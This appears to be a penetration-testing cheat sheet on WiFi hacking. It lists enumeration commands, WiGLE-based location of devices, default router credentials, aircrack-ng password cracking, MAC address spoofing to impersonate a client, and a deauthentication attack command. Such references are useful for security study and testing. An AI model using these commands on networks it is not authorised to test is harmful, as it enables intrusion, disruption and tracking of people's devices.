WiFi Hacking
Last modified: 2024-12-18
Enumeration
# IP addresses
ip addr
# specific interface
ip addr show eth0
ip addr show eth1
ip addr show tun0
# IPv4/6 only
ip -4 addr
ip -6 addr
# Static route
ip route
# Get the currently connected WiFi router's IP address (see the 'Default gateway' line in the output)
ipconfig
# Find any wireless devices
iw dev
# Display information of the specified device
iw dev <interface> info
# Scan wifi networks nearby the specified device
iw dev <interface> scan
# Find another computer's IP address/MAC address on the network
arp -av
# Get public IP address
curl https://api.ipify.org
Using WiGLE
If BSSIDs found, we can find the location for devices using WiGLE.
To find BSSID From SSID using WiGLE:
- Access to WiGLE and login.
- Go to View → Advanced Search.
- Open the General Search tab.
- Input the SSID in the SSID/Network Name.
- Check the result.
Delete Network Interfaces From Your Devices
ip link delete <iterface>
Crack WiFi Passwords
Default Router Credentials
admin:Admin
admin:admin
admin:password
admin:Michelangelo
root:admin
root:alpine
sitecom:Admin
telco:telco
Crack from A Packet Capture File
If we have a packet capture file (.cap or .pcap) of the WiFi network, we can crack the WiFi password using the file.
aircrack-ng example.cap -w wordlist.txt
MAC Address Spoofing
First of all, you need to use network adapter which has monitor mode on your machine.
Aircrack-ng is a complete suite of tools to assess WiFi network security.
-
Preparation
# Show available interfaces airmon-ng # Put an interface into monitor mode airmon-ng start wlan0 airmon-ng start eth0 # or iwconfig wlan0 mode monitor iwconfig eth0 mode monitor # Choose the access point (monitor mode) airodump-ng wlan0mon
-
Retrieve Client's MAC Addresses
# Retrieve client's MAC address from the chosen access point # -c 9: channel 9 # --bssid: target router MAC address # -w psk: the dump file prefix # eth0: interface name airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -i wlan0mon airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk eth0
-
Spoof MAC Address using the Retrieved Address
# Take down the network at first ip link set wlan0 down # Set MAC address which you got by airodump-ng in the previous section macchanger -m XX:XX:XX:XX:XX:XX wlan0 # Bring up the network ip link set wlan0 up
-
Confirmation
# Check the current MAC address macchanger -s wlan0
-
Reset to the Original MAC Address
# Reset to the original (permanent) MAC address macchanger -p wlan0
Deauthentication Attack
Reference: https://medium.com/@flytechoriginal/state-of-wifi-security-in-2024-b88091015cc2
Using (Freeway)[https://github.com/FLOCK4H/Freeway], we can easily achieve this attack.
sudo Freeway -i wlan1 -a deauth
Other Useful Tools
-
The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.
-
List of MAC OUI (Organizationally Unique Identifier). You can get the information from the BSSID.
-
Access to the OUI Standards
If the target BSSID is "B4:5D:50:AA:86:41", search text by inputting "B4-5D-50" on the string search.
Then check the information.
-